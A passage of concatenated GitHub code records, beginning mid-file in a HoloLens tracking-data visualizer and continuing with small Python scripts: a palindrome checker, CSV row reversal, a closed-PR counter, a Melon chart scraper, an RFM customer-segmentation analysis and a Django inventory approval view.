color=colors[2],\r\n label=labels[2])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(z_label)\r\n ax.set_ylim(z_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"Head data from one user\")\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + \"AllUsers/Head\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.show()\r\n plt.savefig(path + \"/\" + f\"HeadData.png\")\r\n plt.close()\r\n\r\n def visualize_all_2d_positions_screen_space(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n position_labels: list[list[str]],\r\n user_name: str,\r\n intention: str,\r\n marker: list[str] = ['o', 'x', 'x'],\r\n visualize_bursts: bool = True,\r\n step_size: int = 5,\r\n offset: int = 0,\r\n colors: list[str] = ['b', 'g', 'r'],\r\n visualize_3d: bool = True,\r\n burst_size: int = constants.SLIDING_WINDOW_SIZE) -> None:\r\n\r\n labels = [\"Eye\", \"Right Hand\", \"Left Hand\"]\r\n\r\n index = 0\r\n image_index = 0\r\n 
while ((index + burst_size) < df_tracking_data_preprocessed.shape[0]):\r\n\r\n if visualize_3d:\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n\r\n for position_label_index, position_label in enumerate(position_labels):\r\n\r\n positions = df_tracking_data_preprocessed[position_label].to_numpy()\r\n\r\n correct_x_positions = np.logical_and(positions[:, 0] >= -1, positions[:, 0] <= 1)\r\n correct_y_positions = np.logical_and(positions[:, 1] >= -1, positions[:, 1] <= 1)\r\n correct_positions = np.logical_and(correct_x_positions, correct_y_positions)\r\n\r\n\r\n positions = positions[correct_positions]\r\n # we ignore the very first and very last samples\r\n positions = positions[offset:-offset]\r\n if (positions.shape[0] == 0):\r\n continue\r\n position_x = positions[:, 0]\r\n position_y = positions[:, 1]\r\n\r\n from_index = index\r\n to_index = from_index + burst_size\r\n burst_position_x = position_x[from_index:to_index]\r\n burst_position_y = position_y[from_index:to_index]\r\n\r\n # here go from screen space to NDC\r\n burst_position_x = ((burst_position_x + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X\r\n burst_position_y = ((burst_position_y + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y\r\n\r\n x_label = \"x - coord\"\r\n x_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X]\r\n y_label = \"y - coord\"\r\n y_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y]\r\n\r\n if visualize_3d:\r\n\r\n time_axis = np.arange(len(burst_position_x))\r\n\r\n ax.scatter(burst_position_x, time_axis, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(\"time\")\r\n # ax.set_ylim(y_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"User data with {intention} over #{burst_size} samples burst\")\r\n\r\n else:\r\n \r\n plt.title(f\"Accumulated user data with {intention} over #{burst_size} samples burst\")\r\n plt.xlabel(x_label)\r\n plt.ylabel(y_label)\r\n plt.xlim(x_range)\r\n plt.ylim(y_range)\r\n plt.scatter(burst_position_x, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention + \"/\" + \"Bursts\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.savefig(path + \"/\" + f\"Accumulated user data from {user_name} with intention {intention} burst {image_index}.png\")\r\n plt.close()\r\n index += step_size\r\n image_index += 1\r\n\r\n def compare_different_burst_sizes(self,\r\n different_burst_sizes) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n x = []\r\n y = []\r\n for index in range(len(different_burst_sizes)):\r\n x.append(different_burst_sizes[index][0])\r\n y.append(different_burst_sizes[index][1][\"mean_test_balanced_accuracy\"])\r\n\r\n plt.title(\"Compare different burst sizes\")\r\n plt.plot(x, y, label='compare burst sizes')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"BurstSizesCompare.png\")\r\n plt.close()\r\n\r\n\r\n\r\n def plot_losses(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, 
exist_ok=True)\r\n loss_curve = clf.best_estimator_[1].loss_curve_\r\n\r\n plt.title(\"Training losses\")\r\n plt.plot(loss_curve, label='losses')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Losses.png\")\r\n plt.close()\r\n\r\n def plot_accuracy(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n colors = [\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"]\r\n\r\n validation_scores = clf.best_estimator_[1].validation_scores_\r\n\r\n plt.plot(validation_scores, label='validation scores', color=colors[0])\r\n\r\n plt.title(\"Accuracy\")\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Accuracy.png\")\r\n plt.close()\r\n\r\n\r\n def plot_confusion_matrix(self, clf, X_test, y_test, burst_size: int) -> None:\r\n\r\n predictions = clf.predict(X_test)\r\n cm = confusion_matrix(y_test, predictions, labels=clf.classes_)\r\n disp = ConfusionMatrixDisplay(confusion_matrix=cm,\r\n display_labels=clf.classes_)\r\n disp.plot()\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"ConfusionMatrix.png\")\r\n plt.close()\r\n\r\n\r\n def plot_all_OvR_ROC_curves(self, model, testX, testY,\r\n class_labels: list[str],\r\n label_binarizer,\r\n burst_size: int) -> None:\r\n\r\n y_score = model.predict_proba(testX)\r\n n_classes = 4\r\n\r\n fig, ax = plt.subplots(figsize=(6, 6))\r\n\r\n y_onehot_test = label_binarizer.transform(testY)\r\n\r\n fpr, tpr, roc_auc = dict(), dict(), dict()\r\n # Compute micro-average ROC curve and ROC area\r\n aux1 = testY.ravel()\r\n aux2 = y_score.ravel()\r\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_onehot_test.ravel(), y_score.ravel())\r\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\r\n\r\n plt.plot(\r\n fpr[\"micro\"],\r\n tpr[\"micro\"],\r\n label=f\"micro-average ROC curve (AUC = {roc_auc['micro']:.2f})\",\r\n color=\"deeppink\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n for i in range(n_classes):\r\n\r\n fpr[i], tpr[i], _ = roc_curve(y_onehot_test[:, i], y_score[:, i])\r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n\r\n fpr_grid = np.linspace(0.0, 1.0, 1000)\r\n\r\n # Interpolate all ROC curves at these points\r\n mean_tpr = np.zeros_like(fpr_grid)\r\n\r\n for i in range(n_classes):\r\n mean_tpr += np.interp(fpr_grid, fpr[i], tpr[i]) # linear interpolation\r\n\r\n # Average it and compute AUC\r\n mean_tpr /= n_classes\r\n\r\n fpr[\"macro\"] = fpr_grid\r\n tpr[\"macro\"] = mean_tpr\r\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\r\n\r\n plt.plot(\r\n fpr[\"macro\"],\r\n tpr[\"macro\"],\r\n label=f\"macro-average ROC curve (AUC = {roc_auc['macro']:.2f})\",\r\n color=\"navy\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n colors = cycle([\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"])\r\n for class_id, color in zip(range(n_classes), colors):\r\n RocCurveDisplay.from_predictions(\r\n testY,\r\n y_score[:, class_id],\r\n name=f\"{class_labels[class_id]} vs the rest\",\r\n color=color,\r\n pos_label=class_id,\r\n ax=ax,\r\n )\r\n\r\n plt.plot([0, 1], [0, 1], \"k--\", label=\"chance level (AUC = 0.5)\")\r\n plt.axis(\"square\")\r\n plt.xlabel(\"False Positive Rate\")\r\n plt.ylabel(\"True Positive Rate\")\r\n plt.title(\"One-vs-Rest ROC curves:\\n\")\r\n plt.legend()\r\n path = constants.MODELS_DATA_PATH + 
f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"One-vs-Rest ROC curves.png\")\r\n plt.close()\r\n\r\n\r\n def visualize_results(self,\r\n df_tracking_data_old: pd.DataFrame,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n eye_data: EyeData,\r\n in_or_out_labels_eye_hit_pos: list[str],\r\n hand_data: HandData,\r\n in_or_out_labels_hand_pos: list[str],\r\n head_data: HeadData,\r\n instance_segmentation_data: InstanceSegmentationData,\r\n masks: np.array,\r\n user_name: str,\r\n intention: str,\r\n columns=1,\r\n rows=1,\r\n max_number_of_batches=50) -> None:\r\n \"\"\"\r\n For data understanding and debugging purposes\r\n \"\"\"\r\n mask_columns_joined = instance_segmentation_data.get_joined_mask_columns()\r\n class_labels = instance_segmentation_data.get_class_labels()\r\n class_probs = instance_segmentation_data.get_prob_labels()\r\n\r\n eye_hit_Pos_screen_space = eye_data.get_new_position_labels()[0]\r\n right_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[0]\r\n left_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[1]\r\n\r\n matplotlib.use('Agg')\r\n\r\n # batch some masks together in some plot\r\n batch_size = (columns * rows)\r\n # iterate over time\r\n saved_fig = 0\r\n for u in range(masks.shape[1] // batch_size):\r\n\r\n plt.axis('off')\r\n fig, axs = plt.subplots(rows, columns, figsize=(15, 15), squeeze=False)\r\n\r\n dataset = TruckDataSet()\r\n labels = dataset.get_labels()\r\n\r\n # plot multiple time steps at once\r\n for i in range(0, rows):\r\n for j in range(0, columns):\r\n\r\n axs[i, j].invert_yaxis()\r\n # ax1 = fig.add_subplot(rows, columns, i)\r\n global_index = u * batch_size + (i * columns + j)\r\n\r\n img_count = 0\r\n\r\n # iterate over all mask of a time step\r\n for m in range(len(mask_columns_joined)):\r\n\r\n # all masks from the #m instance segmentation mask\r\n masks_of_segmentation_result_m = masks[m]\r\n class_labels_of_segmentation_result_m = df_tracking_data_old[class_labels[m]]\r\n class_probs_of_segmentation_result_m = df_tracking_data_old[class_probs[m]]\r\n\r\n if (labels[class_labels_of_segmentation_result_m[global_index]] != \"platform\"):\r\n continue\r\n\r\n img_count += 1\r\n\r\n eye_hit_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_eye_hit_pos[0][m]].iloc[global_index]\r\n right_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[0][m]].iloc[global_index]\r\n left_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[1][m]].iloc[global_index]\r\n\r\n window_shape = (constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X)\r\n torch_resized = F.interpolate(input=torch.from_numpy(masks_of_segmentation_result_m[global_index])[None, None], size=window_shape, mode='bilinear', align_corners=False)[0]\r\n img = axs[i, j].imshow(torch_resized[0].numpy(), origin='upper')\r\n\r\n if (img_count == 0):\r\n break\r\n\r\n plt.title(f\"Segmentation masks \\n with projected user data in screen space \\nt = {u}\", fontsize=20)\r\n plt.colorbar(img, ax=axs[i, j], orientation='horizontal')\r\n\r\n eye_hit_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n 
constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n right_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n left_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n marker_size = 500\r\n axs[i, j].scatter(eye_hit_pos_ndc[0],\r\n eye_hit_pos_ndc[1],\r\n color='ghostwhite',\r\n s=marker_size,\r\n label=eye_hit_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(right_index_tip_pos_ndc[0],\r\n right_index_tip_pos_ndc[1],\r\n color='orangered',\r\n marker='x',\r\n s=marker_size,\r\n label=right_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(left_index_tip_pos_ndc[0],\r\n left_index_tip_pos_ndc[1],\r\n color='g',\r\n marker='x',\r\n s=marker_size,\r\n label=left_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].set_xlabel('x-coord')\r\n axs[i, j].set_ylabel('y-coord')\r\n axs[i, j].legend(loc='lower left', fontsize='xx-large')\r\n\r\n fig.tight_layout()\r\n\r\n if (img_count == 0):\r\n continue\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention\r\n\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n plt.savefig(path + \"/\" + f\"instance_segmentation_masks_t_{saved_fig}.png\")\r\n saved_fig += 1\r\n\r\n plt.clf()\r\n plt.cla()\r\n plt.close(fig)\r\n","repo_name":"Kataglyphis/Designing-User-adaptive-Content-for-Mixed-Reality-Using-Eye-and-Hand-Tracking","sub_path":"UserGuidanceAI/visualization/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
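Editor's note: the record above builds micro- and macro-averaged One-vs-Rest ROC curves by hand. A minimal, self-contained sketch of the micro-average step with scikit-learn, on synthetic labels and scores (all names and numbers below are invented for illustration, not taken from the repo):

import numpy as np
from sklearn.metrics import roc_curve, auc
from sklearn.preprocessing import label_binarize

rng = np.random.RandomState(0)
n_samples, n_classes = 200, 4
y_true = rng.randint(0, n_classes, n_samples)
y_score = rng.rand(n_samples, n_classes)
y_score /= y_score.sum(axis=1, keepdims=True)  # fake per-class probabilities

# Micro-averaging flattens all one-vs-rest decisions into a single binary problem.
y_onehot = label_binarize(y_true, classes=[0, 1, 2, 3])
fpr, tpr, _ = roc_curve(y_onehot.ravel(), y_score.ravel())
print("micro-average AUC:", auc(fpr, tpr))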
+{"seq_id":"30899051666","text":"# Program created by Brayan Vera. Date 07/12/21\n\n# Program name: Palindrome_Num_Identifier\n# -This program makes sure to accept only palindrome numbers.\n# -This means the number that is the same as reversed.\n# -This program returns True if palindrome number is entered,\n# returns False otherwise.\n# -This program does not accept negative numbers.\n# -Thisprogram does not accept strings.\n# Example:\n# 121 is good = True\n# 12321 is good = True\n# 122221 is good = True\n# 1211121 is good = True\n# 2222 is good = True\n# 1221 is good = True\n# -121 not valid = False\n\n# Found another technique:\n# -This program does not follow this technique, but we can also check last digit and first digit\n# incrementing and decrementing the indexes until we reach the middle and stop the program.\n\n# The way this program operates is by storing the input in a list that separates each digit\n# Then another list in reverse is created and in the end is compared to see if is a palindrome.\ndef palindrome_check(x):\n # Makes sure to not accept strings.\n if isinstance(x,str) == True:\n print(\"Invalid input, only numbers please, no string.\")\n return False\n # Makes sure does not accept negative numbers.\n if x < 0:\n print(\"Not valid, only possitive numbers please.\")\n return False\n\n # Conversts the number to a string.\n int_to_str = str(x)\n # To split each number value individually and placed them into a list.\n n = 1\n split_string = [int_to_str[index: index + n] for index in range(0, len(int_to_str), n)]\n #print(\"The first string: {}\".format(split_string))\n\n # Creating a new list to store the given list before it disappears when poping.\n store_old_str = []\n for store_old in split_string:\n store_old_str.append(store_old)\n\n new_list = []\n # Used to pop the last value of the old list and storing it into a new list.\n while len(split_string) != 0:\n last_val_pop = split_string.pop()\n new_list.append(last_val_pop)\n #print(\"The new list: {}\".format(new_list))\n\n #print(\"The old string is : {}\".format(store_old_str))\n #print(\"The new reversed string is : {}\".format(new_list))\n\n if store_old_str == new_list:\n print(\"Is a palindrome.\")\n return True\n else:\n print(\"Is not a palindrome.\")\n return False\n\ndef main():\n x = 155545 #Enter number here. \n palindrome_check(x)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"blvera/Brayan-Vera-Projects","sub_path":"My LeetCode - Python solved problems/Palindrome_Num_Identifier.py","file_name":"Palindrome_Num_Identifier.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"17700881463","text":"import csv\n\n# open up numbers.csv\ncsv_file = open(\"numbers.csv\", \"r\")\ncsv_reader = csv.reader(csv_file)\n\n# open up reverse.csv\ncsv_new = open('reverse.csv', 'w')\ncsv_writer = csv.writer(csv_new)\n\n# take reversed csv_reader and dump into csv_writer\nfor row in csv_reader:\n row.reverse()\n csv_writer.writerow(row)\n\n# close both files, need to reopen csv_new as a read file\ncsv_file.close()\ncsv_new.close()\n\nwith open('reverse.csv', 'r') as reverseRows:\n for row in list(csv.reader(reverseRows)):\n # reset sum for each row\n sum = 0\n # for loop for each data point (30 columns) making sum for each row\n for i in range(30):\n sum += int(row[i])\n # average equation for each row\n average = float(sum / 30)\n # print that average, formatted to 2 decimal points\n print(\"The average for this row is: {:0.2f}\".format(average))\n\n\n","repo_name":"drewgillis9/Gillis_LMSC_261_ProblemSets","sub_path":"ProblemSet10/ProblemSet10.2.py","file_name":"ProblemSet10.2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"27366390338","text":"import datetime\nimport json\n\nfrom common.automator_client import client\nfrom common.repos import ALL_REPOS\n\n\ndef get_items(org, repo, item_type):\n query_params = {\n \"org\": org,\n \"repo\": repo,\n \"item_type\": item_type,\n \"states[]\": ['CLOSED'],\n \"limit[]\": ['first', '100']\n }\n response = client.github.items.get(query_params=query_params)\n return json.loads(response.body)\n\n\ntotal_closed_prs = 0\nfor org in ALL_REPOS:\n for repo in ALL_REPOS[org]:\n items = get_items(org, repo, 'pull_requests')\n for item in items:\n closed_at = datetime.datetime.strptime(item['closedAt'], '%Y-%m-%dT%H:%M:%SZ')\n text = \"{}, {} , {}, {}, {}\".format(repo, item['url'], item['points'],\n item['reviewer_points'], closed_at.date())\n print(text)\n total_closed_prs = total_closed_prs + 1\n\nprint(\"There were a total of {} closed prs across all repos\".format(total_closed_prs))\n","repo_name":"sendgrid/dx-automator","sub_path":"examples/closed_prs.py","file_name":"closed_prs.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"38"}
+{"seq_id":"71757895472","text":"from bs4 import BeautifulSoup\nimport csv\nimport requests\nfrom pprint import pprint\n\nmelon_url = 'https://www.melon.com/chart/index.htm'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'\n}\n\nresponse = requests.get(melon_url, headers=headers).text\n# pprint(response)\n\ndata = BeautifulSoup(response, 'html.parser')\n# print(data)\n\nsongs = data.select('#lst50')\n# print(songs)\n\nresult_list = []\nfor song in songs:\n rank = song.select_one('td:nth-child(2) > div > span.rank').text\n name = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank01 > span > a').text\n # artist = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank02 > a').text\n # artists = song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > a')\n artists = song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > span.checkEllipsis')\n # result_dict = {'rank': rank, 'name': name, 'artist': artist}\n # result_dict = {'rank': rank, 'name': name, 'artist': ','.join([artist.text for artist in artists])}\n result_dict = {'rank': rank, 'name': name, 'artist': [artist.text for artist in artists]}\n result_list.append(result_dict)\n# print(result_list)\n\nwith open('melon_rank_01.csv', 'w', encoding='utf-8', newline='') as csvfile:\n fieldnames = ('rank','name','artist')\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for item in result_list:\n writer.writerow(item)","repo_name":"athletejuan/TIL","sub_path":"Python/SS4th/StartCamp/Write_Read/csv/practice/melon_rank_01.py","file_name":"melon_rank_01.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"11472003479","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\nimport warnings\r\nimport seaborn as sns\r\nimport plotly as py\r\nimport plotly.graph_objs as go\r\nimport plotly.offline as py\r\npy.offline.init_notebook_mode()\r\nwarnings.filterwarnings('ignore')\r\npd.set_option('display.max_columns',None)\r\nfile_path = './data.csv'\r\ndf = pd.read_csv(file_path)\r\n#print(df.head())\r\n#print(df.info())\r\n#print(df[df['InvoiceNo'].str[0] == 'C'])\r\n\r\n\r\n#数据清洗\r\nprint(df.apply(lambda x:sum(x.isnull())/len(x),axis=0))\r\ndf.drop(['Description'],axis=1,inplace=True)\r\n#print(df)\r\ndf['CustomerID'] = df['CustomerID'].fillna('U')\r\ndf['amount'] = df['Quantity']*df['UnitPrice']\r\n#print(df.info())\r\ndf['date']= [i.split(' ')[0] for i in df['InvoiceDate']]\r\n# df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\r\n# df['date'] = [i.strftime('%d-%m-%Y') for i in df['InvoiceDate']]\r\n\r\n# print(df.info())\r\n# print(df.head())\r\ndf['time'] = [i.split(' ')[1] for i in df['InvoiceDate']]\r\n#print(df[['time','date']])\r\ndf.drop(['InvoiceDate'],axis=1,inplace=True)\r\n#print(df['date'].head())\r\ndf['year'] = [i.split('/')[2] for i in df['date']]\r\ndf['month'] = [i.split('/')[0] for i in df['date']]\r\ndf['day'] = [i.split('/')[1] for i in df['date']]\r\n#print(df[['date','year','month','day']].head())\r\ndf['date'] = pd.to_datetime(df['date'])\r\ndf = df.drop_duplicates()\r\n# print(df.describe())\r\ndf2 = df.loc[df['UnitPrice']<=0]\r\n# print(df2.shape[0]/df.shape[0])\r\n# print(df2['UnitPrice'].groupby(by=df2['UnitPrice']).count())\r\n\r\n#数据分析\r\ndf1 = df.loc[(df['Quantity']<=0)]\r\ntt = pd.pivot_table(df1, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(tt)\r\ndf2 = df[(df['Quantity']>0) & (df['UnitPrice']>0)]\r\npp = pd.pivot_table(df2, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(pp)\r\n# print(np.abs(tt/pp))\r\nnp.abs(tt/pp).loc['2011'].mean()\r\n\r\n#画图(已解决)\r\n\r\nR_value = df.groupby('CustomerID')['date'].max()\r\ndf2['date'].max()\r\nR_value = (df2['date'].max()-R_value).dt.days\r\nF_value = df2.groupby('CustomerID')['InvoiceNo'].nunique()\r\nM_value = df2.groupby('CustomerID')['amount'].sum()\r\nsns.set(style = 'darkgrid')\r\n# plt.hist(R_value)\r\n# plt.show()\r\nR_bins = [0,30,90,180,360,720]\r\nF_bins = [1,2,5,10,20,5000]\r\nM_bins = [0,55,2000,5000,10000,200000]\r\nR_score = pd.cut(R_value,R_bins,labels=[5,4,3,2,1],right=False)\r\n#print(R_score)\r\nF_score = pd.cut(F_value,F_bins,labels=[1,2,3,4,5],right=False)\r\nM_score = pd.cut(M_value,M_bins,labels=[1,2,3,4,5],right=False)\r\nrfm = pd.concat([R_score,F_score,M_score],axis=1)\r\n#print(F_score.shape,M_score.shape,R_score.shape)\r\n# print(rfm)\r\nrfm.rename(columns={'date':'R_score','InvoiceNo':'F_score','amount':'M_score'},inplace=True)\r\nfor i in ['R_score','F_score','M_score']:\r\n rfm[i] = rfm[i].astype(float)\r\nrfm['R'] = np.where(rfm['R_score']>3.82,'高','低')\r\nrfm['F'] = np.where(rfm['F_score']>2.03,'高','低')\r\nrfm['M'] = np.where(rfm['M_score']>1.8,'高','低')\r\nrfm['value'] = rfm['R'].str[:] +rfm['F'].str[:] + rfm['M'].str[:]\r\n#print(rfm.info())\r\ndef trans_value(x):\r\n if x == '高高高':\r\n return '重要价值客户'\r\n elif x=='高低高':\r\n return '重要发展客户'\r\n elif x== '低高高':\r\n return '重要保持客户'\r\n elif x== '低低高':\r\n return '重要挽留客户'\r\n elif x=='高高低':\r\n return '一般价值客户'\r\n elif x== '高低低':\r\n return '一般发展客户'\r\n elif x=='低高低':\r\n return '一般保持客户'\r\n else:\r\n return 
'一般挽留客户'\r\n\r\nrfm['用户等级'] = rfm['value'].apply(trans_value)\r\nrfm['用户等级'].value_counts()\r\ntrade_basic = [go.Bar(x = rfm['用户等级'].value_counts().index, y=rfm['用户等级'].value_counts().values,marker = dict(color='orange'),opacity=0.50)]\r\nlayout = go.Layout(title='用户等级情况',xaxis = dict(title='用户重要度'))\r\nfigure_basic = go.Figure(data= trade_basic,layout=layout)\r\npy.plot(figure_basic)\r\n# trace = [go.Pie(labels= rfm['用户等级'].value_counts().index, values=rfm['用户等级'].value_counts().values,textfont=dict(size=12,color='white'))]\r\n# layout2 = go.Layout(title='用户等级比例')\r\n# figure_basic2 = go.Figure(data= trace,layout=layout2)\r\n# py.plot(figure_basic2)\r\n\r\n#结论和建议\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"HarCP3/data-analysis","sub_path":"ecommerce.py","file_name":"ecommerce.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
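Editor's note: the RFM scoring above leans entirely on pd.cut. A tiny self-contained illustration of how the recency binning behaves (toy values, not the shop's data):

import pandas as pd

recency_days = pd.Series([5, 40, 200, 400])
R_bins = [0, 30, 90, 180, 360, 720]
# right=False makes the bins left-closed: [0, 30), [30, 90), ...
# Lower recency is better, so the labels run from 5 down to 1.
R_score = pd.cut(recency_days, R_bins, labels=[5, 4, 3, 2, 1], right=False)
print(R_score.tolist())  # [5, 4, 2, 1]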
+{"seq_id":"26621470227","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, generics, permissions, views, exceptions, response\n\nfrom . import models as inv_model\nfrom . import serializers as inv_serializer\n\nfrom account.models import UserMixIn\nfrom account.permissions import IsStoreManager\n\n\nclass InventoryView(viewsets.ModelViewSet):\n model = inv_model.Inventory\n queryset = model.objects.all()\n serializer_class = inv_serializer.InventorySerilizer\n\n def perform_create(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.CREATE\n serializer.save()\n\n def perform_update(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.UPDATE\n serializer.save()\n\n def perform_destroy(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.DELETE\n serializer.save()\n\n\nclass AccepetRejectInventory(views.APIView):\n \"\"\" accept or reject inventory\"\"\"\n permission_classes = (\n permissions.IsAuthenticated, IsStoreManager,\n )\n\n def post(self, request, *args, **kwargs):\n action_name = kwargs['action_type']\n try:\n inventory = inv_model.Inventory.objects.get(id=kwargs['id'])\n except inv_model.Inventory.DoesNotExist:\n raise exceptions.ParseError({'details':\"Invalid id\"})\n \n if action_name == \"accept\":\n update_data = inventory.update_data\n for key, value in update_data:\n setattr(inventory, key, value)\n inventory.status = inv_model.Inventory.ACCEPT\n inventory.save()\n else:\n inventory.status = inv_model.Inventory.PENDING\n inventory.save()\n return response.Response({'details': \"Inventroy updated 